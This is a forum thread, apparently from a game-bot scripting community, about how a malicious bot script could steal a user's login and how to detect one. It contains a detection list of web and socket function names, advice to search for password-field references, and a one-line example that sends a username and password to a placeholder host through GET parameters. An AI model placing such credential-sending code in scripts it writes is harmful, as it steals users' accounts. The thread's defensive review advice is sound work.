I'm just very cautious, so I'd like to hear how someone can hack your account, via a script.

I've always checked for http sites in the script, and IP's.

How else can they make the script send my password/username, to them?

Shadow just for the sake of avoiding thousands of leeches from seeing this thread and giving Simba a bad name no one will answer this question directly. Or maybe they will but perhaps it would be better if someone would PM you.

just use the security thing in extensions.
it will stop any outgoing transmissions

Shadow just for the sake of avoiding thousands of leeches from seeing this thread and giving Simba a bad name no one will answer this question directly. Or maybe they will but perhaps it would be better if someone would PM you.

Leechers won't know how to script it anyways.

I just want to know the indirect methods, like IP and ftp.... Won't hurt anyone..

Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc.

Edit: Also, as stated below, check for references of .User, .Pass, and .Pin in places other than the declaration of players (use Ctrl+F to find them).

Don't post actual code you guys.....

Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc. (though usually not the socket library ;p)

Edit: In response to the post below: The commit/o functions most likely contained some of the above functions so you can still feel safe if you cannot find them :).

Oh, that's alot of functions.

I just thought/hoped that you could only do it with websites/ips, but as I can see in the example above, it can be made into an algorithm so it's harder to spot.. :S

E: noted

I would check any references of name/pass/pin in the script. It should never be used anywhere other than the login/banking.

.

I would check any references of name/pass/pin in the script. It should never be used anywhere other than the login/banking.

Yeah, exactly. It's an algorithm right? that functions as a website, but we can't see it without studying the script...?

You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

They could even send it encrypted so you wouldn't notice.

Yeah, exactly. It's an algorithm right? that functions as a website, but we can't see it without studying the script...?

No. It was gibberish code to confuse you and it was a bad attempt of doing it anyway.

yeah, but in order to protect your account you would look over the script in the first place wouldnt you?

I look over every script before i use it :)

yeah, but in order to protect your account you would look over the script in the first place wouldnt you?

I look over every script before i use it :)

Yes........?

That's what the thread is about. How to detect a malicious script, while looking through it.

Using any of the Socket or Web libraries. If you see any of these functions in the script:

OpenWebPage
GetPage
InitializeHTTPClient
InitializeHTTPClient
GetHTTPPage
SetHTTPUserAgent
PostHTTPPage
PostHTTPPageEx
ClearPostData
AddPostVariable
GetRawHeaders
SetProxy

CreateSocket
FreeSocket
ConnectSocket
BindSocket
ListenSocket
AcceptSocket
CloseSocket
RecvSocket
RecvSocketStr
RecvSocketEx
SendSocket
SetTimeout
SocketInfo

Then the script may be malicious. Note that I said may, some scripts use them to check for versions, retrieve updates or news, etc. (though usually not the socket library ;p)

Edit: In response to the post below: The commit/o functions most likely contained some of the above functions so you can still feel safe if you cannot find them :).

There is no way a script can steal your password if it uses the "GetPage" function. Look up what it does... I used that function in my script to check for a newer version of the script, and if there was it would alert the user. But that function does no sending of data whatsoever.

You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

The Security extension stops outgoing transmissions for the most part, but as we get smarter so do they.
An example of this is KeyLoggers once they were run of the mill easily detected with the use of Virus Scanners, now they are Changed so that they are not able to be detected by the majority of Virus Scanners including malware bites.

IMO every should get a ExterminateIT license, it has done a wolrd of good for me, and stopped a number of DriveBYS, and also stopped a number of WannaBE infiltrators

Just get the username and password from the Declare Player and post it to a server.

You should always check if the password field (Like Players[x].pass) is used anywhere in the script where it shouldn't be. Someone could for example make their script pm everyone's password to him through runescape and security extension would say nothing, I think.

They could even send it encrypted so you wouldn't notice.

Oh, interesting. Yeah, that would be a better way of doing this :p. Just Ctrl+F for references of .Pass, .User, and .Pin.


The Security extension stops outgoing transmissions for the most part, but as we get smarter so do they.
An example of this is KeyLoggers once they were run of the mill easily detected with the use of Virus Scanners, now they are Changed so that they are not able to be detected by the majority of Virus Scanners including malware bites.

IMO every should get a ExterminateIT license, it has done a wolrd of good for me, and stopped a number of DriveBYS, and also stopped a number of WannaBE infiltrators
I must say, I was about to report you as a bot..

Yes........?

That's what the thread is about. How to detect a malicious script, while looking through it.

Yes i should i quoted the previous posted about the diff variables to look for, thats what i mean i look over the script for.

My apologies for any confusion

Just get the username and password from the Declare Player and post it to a server.

What? Have you even read the thread? :duh:


Oh, interesting. Yeah, that would be a better way of doing this :p. Just Ctrl+F for references of .Pass, .User, and .Pin.


I must say, I was about to report you as a bot..

A lot faster than your way at least :p

Accidental doublepost.

I must say, I was about to report you as a bot..

What and why is that?
Because i forgot to quote something, i do so apologise for that slight inconvenience, and i will try not to allow that to happen again.

But that was why yes?

What and why is that?
Because i forgot to quote something, i do so apologise for that slight inconvenience, and i will try not to allow that to happen again.

But that was why yes?

Yeah :p. It wasn't meant to be a hostile remark...

Yeah :p. It wasn't meant to be a hostile remark...

nor did i take it as one, i took it as it was meant to be taken :)
I understand that spam bots have been here trying to raise post counts, anyways witht hat said sorry for going off topic shadow :)

There is no way a script can steal your password if it uses the "GetPage" function. Look up what it does... I used that function in my script to check for a newer version of the script, and if there was it would alert the user. But that function does no sending of data whatsoever.

I was just listing the contents of the Web library. However, the GetPage function CAN send data.


GetPage('http://example.com?user=' + User + '&pass=' + Pass);

To be more specific, GetPage can still send GET variables.